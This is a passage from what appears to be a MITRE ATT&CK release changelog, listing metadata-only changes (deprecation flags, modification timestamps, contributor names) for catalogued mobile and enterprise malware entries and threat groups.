dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:58.030000+00:002025-04-25 14:42:49.417000+00:00

[S0123] xCmd

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:51.879000+00:002025-04-25 14:45:18.852000+00:00

[S0248] yty

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:53.646000+00:002025-04-25 14:42:35.950000+00:00

mobile-attack

Patches

[S0310] ANDROIDOS_ANSERVER.A

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:08.276000+00:002025-04-25 14:40:25.685000+00:00

[S0309] Adups

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:15.993000+00:002025-04-25 14:40:45.642000+00:00

[S0440] Agent Smith

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:11.884000+00:002025-04-25 14:40:35.302000+00:00

[S1095] AhRat

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2025-01-24 17:12:44.782000+00:002025-04-22 21:22:24.938000+00:00
x_mitre_contributors[0]Edward StevensEdward Stevens, BT Security
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_contributorsBT Security

[S0319] Allwinner

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:03.823000+00:002025-04-25 14:40:14.772000+00:00

[S0525] Android/AdDisplay.Ashas

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:16.304000+00:002025-04-25 14:40:46.381000+00:00

[S0304] Android/Chuli.A

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:14.103000+00:002025-04-25 14:40:40.920000+00:00

[S0524] AndroidOS/MalLocker.B

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:11.027000+00:002025-04-25 14:40:32.960000+00:00

[S0540] Asacub

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:12.041000+00:002025-04-25 14:40:35.670000+00:00

[S0555] CHEMISTGAMES

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:11.340000+00:002025-04-25 14:40:33.676000+00:00

[S0529] CarbonSteal

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:03.013000+00:002025-04-25 14:40:13.122000+00:00

[S0480] Cerberus

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:03.157000+00:002025-04-25 14:40:13.502000+00:00

[S0323] Charger

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:14.258000+00:002025-04-25 14:40:41.299000+00:00

[S0602] Circles

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:13.137000+00:002025-04-25 14:40:38.438000+00:00

[S0426] Concipit1248

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:10.526000+00:002025-04-25 14:40:31.516000+00:00

[S0425] Corona Updates

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:07.148000+00:002025-04-25 14:40:23.129000+00:00

[S0479] DEFENSOR ID

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:08.935000+00:002025-04-25 14:40:27.329000+00:00

[S0301] Dendroid

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:06.526000+00:002025-04-25 14:40:21.321000+00:00

[S0550] DoubleAgent

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:07.802000+00:002025-04-25 14:40:24.588000+00:00

[S0300] DressCode

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:16.646000+00:002025-04-25 14:40:47.460000+00:00

[S0315] DualToy

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:08.432000+00:002025-04-25 14:40:26.050000+00:00

[S0420] Dvmap

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:05.219000+00:002025-04-25 14:40:18.436000+00:00

[S0478] EventBot

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:12.346000+00:002025-04-25 14:40:36.402000+00:00

[S0509] FakeSpy

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:10.213000+00:002025-04-25 14:40:30.790000+00:00

[S0408] FlexiSpy

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:17.243000+00:002025-04-25 14:40:48.201000+00:00

[S0536] GPlayed

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:12.191000+00:002025-04-25 14:40:36.033000+00:00

[S0423] Ginp

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:09.244000+00:002025-04-25 14:40:28.434000+00:00

[S0535] Golden Cup

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:15.703000+00:002025-04-25 14:40:44.740000+00:00

[S0551] GoldenEagle

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:03.977000+00:002025-04-25 14:40:15.155000+00:00

[S0421] GolfSpy

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:12.846000+00:002025-04-25 14:40:37.700000+00:00

[S0290] Gooligan

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:04.607000+00:002025-04-25 14:40:16.979000+00:00

[S0406] Gustuff

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:16.804000+00:002025-04-25 14:40:47.835000+00:00

[S0544] HenBox

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:12.500000+00:002025-04-25 14:40:36.765000+00:00

[S0321] HummingWhale

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:09.395000+00:002025-04-25 14:40:28.796000+00:00

[S0463] INSOMNIA

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:05.067000+00:002025-04-25 14:40:18.080000+00:00

[S0325] Judy

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:04.284000+00:002025-04-25 14:40:16.257000+00:00

[S0288] KeyRaider

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:07.456000+00:002025-04-25 14:40:23.854000+00:00

[S0485] Mandrake

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:08.595000+00:002025-04-25 14:40:26.424000+00:00

[S0303] MazarBOT

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:09.084000+00:002025-04-25 14:40:28.053000+00:00

[S0407] Monokle

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:09.753000+00:002025-04-25 14:40:29.512000+00:00

[S0299] NotCompatible

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:05.573000+00:002025-04-25 14:40:19.154000+00:00

[S0286] OBAD

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:13.949000+00:002025-04-25 14:40:40.325000+00:00

[S0285] OldBoot

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:04.440000+00:002025-04-25 14:40:16.618000+00:00

[S0291] PJApps

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:13.454000+00:002025-04-25 14:40:39.221000+00:00

[S0399] Pallas

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:12.993000+00:002025-04-25 14:40:38.069000+00:00

[S0316] Pegasus for Android

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:10.874000+00:002025-04-25 14:40:32.245000+00:00

[S0295] RCSAndroid

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:06.991000+00:002025-04-25 14:40:22.773000+00:00

[S0539] Red Alert 2.0

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:09.903000+00:002025-04-25 14:40:29.878000+00:00

[S0403] Riltok

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:12.694000+00:002025-04-25 14:40:37.303000+00:00

[S0411] Rotexy

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:03.463000+00:002025-04-25 14:40:14.047000+00:00

[S0313] RuMMS

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:10.719000+00:002025-04-25 14:40:31.880000+00:00

[S0294] ShiftyBug

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:13.608000+00:002025-04-25 14:40:39.602000+00:00

[S0549] SilkBean

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:14.758000+00:002025-04-25 14:40:42.577000+00:00

[S0419] SimBad

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:16.143000+00:002025-04-25 14:40:46.008000+00:00

[S0327] Skygofree

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:07.299000+00:002025-04-25 14:40:23.488000+00:00

[S0324] SpyDealer

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:10.366000+00:002025-04-25 14:40:31.154000+00:00

[S0305] SpyNote RAT

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:04.768000+00:002025-04-25 14:40:17.353000+00:00

[S0328] Stealth Mango

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:03.669000+00:002025-04-25 14:40:14.412000+00:00

[S0545] TERRACOTTA

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:15.370000+00:002025-04-25 14:40:43.667000+00:00

[S0329] Tangelo

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:06.838000+00:002025-04-25 14:40:22.408000+00:00

[S0558] Tiktok Pro

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:13.285000+00:002025-04-25 14:40:38.825000+00:00

[S0424] Triada

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:15.523000+00:002025-04-25 14:40:44.380000+00:00

[S0427] TrickMo

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:04.918000+00:002025-04-25 14:40:17.722000+00:00

[S0307] Trojan-SMS.AndroidOS.Agent.ao

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:11.724000+00:002025-04-25 14:40:34.229000+00:00

[S0306] Trojan-SMS.AndroidOS.FakeInst.a

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:05.907000+00:002025-04-25 14:40:20.063000+00:00

[S0308] Trojan-SMS.AndroidOS.OpFake.a

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:14.410000+00:002025-04-25 14:40:41.844000+00:00

[S0302] Twitoor

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:07.968000+00:002025-04-25 14:40:24.958000+00:00

[S0418] ViceLeaker

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:10.060000+00:002025-04-25 14:40:30.243000+00:00

[S0506] ViperRAT

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:15.850000+00:002025-04-25 14:40:45.280000+00:00

[S0312] WireLurker

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:06.693000+00:002025-04-25 14:40:21.687000+00:00

[S0489] WolfRAT

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:14.905000+00:002025-04-25 14:40:42.935000+00:00

[S0314] X-Agent for Android

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:08.784000+00:002025-04-25 14:40:26.968000+00:00

[S0318] XLoader for Android

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:05.761000+00:002025-04-25 14:40:19.697000+00:00

[S0490] XLoader for iOS

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:06.053000+00:002025-04-25 14:40:20.425000+00:00

[S0298] Xbot

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:17.393000+00:002025-04-25 14:40:48.566000+00:00

[S0297] XcodeGhost

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:14.566000+00:002025-04-25 14:40:42.212000+00:00

[S0494] Zen

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:05.422000+00:002025-04-25 14:40:18.792000+00:00

[S0287] ZergHelper

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:22:07.644000+00:002025-04-25 14:40:24.224000+00:00

ics-attack

Patches

[S0446] Ryuk

Current version: 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:27.373000+00:002025-04-22 22:21:23.589000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsThe DFIR Report
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_contributorsThe DFIR Report, @TheDFIRReport

Groups

enterprise-attack

Patches

[G0099] APT-C-36

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:39.643000+00:002025-04-25 14:49:32.503000+00:00

[G0006] APT1

Current version: 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:37.426000+00:002025-04-25 14:49:20.672000+00:00

[G0005] APT12

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:37.119000+00:002025-04-25 14:49:18.305000+00:00

[G0096] APT41

Current version: 4.1

Details
values_changed
STIX FieldOld valueNew Value
modified2024-10-10 14:31:35.326000+00:002025-04-22 21:56:33.318000+00:00

[G0060] BRONZE BUTLER

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:34.368000+00:002025-04-25 14:48:57.719000+00:00

[G0135] BackdoorDiplomacy

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:34.519000+00:002025-04-25 14:48:58.613000+00:00

[G0063] BlackOasis

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:41.036000+00:002025-04-25 14:49:40.224000+00:00

[G0098] BlackTech

Current version: 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:33.408000+00:002025-04-25 19:03:07.787000+00:00
x_mitre_contributors[1]Hannah Simes, BT SecurityHannah S

[G0008] Carbanak

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:39.338000+00:002025-04-25 14:49:30.378000+00:00

[G0079] DarkHydrus

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:39.039000+00:002025-04-25 14:49:28.547000+00:00

[G0105] DarkVishnya

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:35.190000+00:002025-04-25 14:49:05.248000+00:00

[G1003] Ember Bear

Current version: 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2024-12-03 20:19:38.721000+00:002025-04-25 19:03:38.177000+00:00
x_mitre_contributors[0]Hannah Simes, BT SecurityHannah S

[G0020] Equation

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:33.110000+00:002025-04-25 14:48:45.400000+00:00

[G0120] Evilnum

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:38.720000+00:002025-04-25 14:49:26.766000+00:00

[G0053] FIN5

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:38.089000+00:002025-04-25 14:49:23.588000+00:00

[G0137] Ferocious Kitten

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:40.731000+00:002025-04-25 14:49:38.455000+00:00

[G0036] GCMAN

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:40.552000+00:002025-04-25 14:49:37.572000+00:00

[G0084] Gallmaker

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:40.106000+00:002025-04-25 14:49:34.304000+00:00

[G0078] Gorgon Group

Current version: 1.5

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:36.314000+00:002025-04-25 14:49:11.522000+00:00

[G0136] IndigoZebra

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:41.185000+00:002025-04-25 14:49:40.589000+00:00

[G1004] LAPSUS$

Current version: 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2025-04-07 14:44:59.715000+00:002025-04-21 19:40:47.538000+00:00
x_mitre_contributors[2]Flavio Costa, CiscoFlávio Costa, @Segurança Descomplicada

[G0030] Lotus Blossom

Current version: 4.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Prinesha Dobariya']
values_changed
STIX FieldOld valueNew Value
modified2025-04-04 17:35:44.589000+00:002025-04-23 21:20:58.367000+00:00

[G0095] Machete

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:37.929000+00:002025-04-25 14:49:22.323000+00:00

[G0002] Moafee

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:41.833000+00:002025-04-25 14:49:46.105000+00:00

[G0055] NEODYMIUM

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:41.988000+00:002025-04-25 14:49:46.469000+00:00

[G0019] Naikon

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:37.579000+00:002025-04-25 14:49:21.044000+00:00

[G0068] PLATINUM

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:35.512000+00:002025-04-25 14:49:07.040000+00:00

[G0011] PittyTiger

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:40.885000+00:002025-04-25 14:49:38.981000+00:00

[G0033] Poseidon Group

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:39.948000+00:002025-04-25 14:49:33.223000+00:00

[G0048] RTM

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:34.877000+00:002025-04-25 14:49:01.288000+00:00

[G0106] Rocke

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:36.004000+00:002025-04-25 14:49:08.821000+00:00

[G0029] Scarlet Mimic

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:41.499000+00:002025-04-25 14:49:45.222000+00:00

[G0122] Silent Librarian

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:39.188000+00:002025-04-25 14:49:29.613000+00:00

[G0054] Sowbug

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:37.765000+00:002025-04-25 14:49:21.603000+00:00

[G0038] Stealth Falcon

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:35.038000+00:002025-04-25 14:49:04.710000+00:00

[G0041] Strider

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:41.346000+00:002025-04-25 14:49:43.099000+00:00

[G0062] TA459

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:37.273000+00:002025-04-25 14:49:19.743000+00:00

[G0089] The White Company

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:39.790000+00:002025-04-25 14:49:32.865000+00:00

[G0028] Threat Group-1314

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:35.353000+00:002025-04-25 14:49:05.962000+00:00

[G0076] Thrip

Current version: 1.2

Details
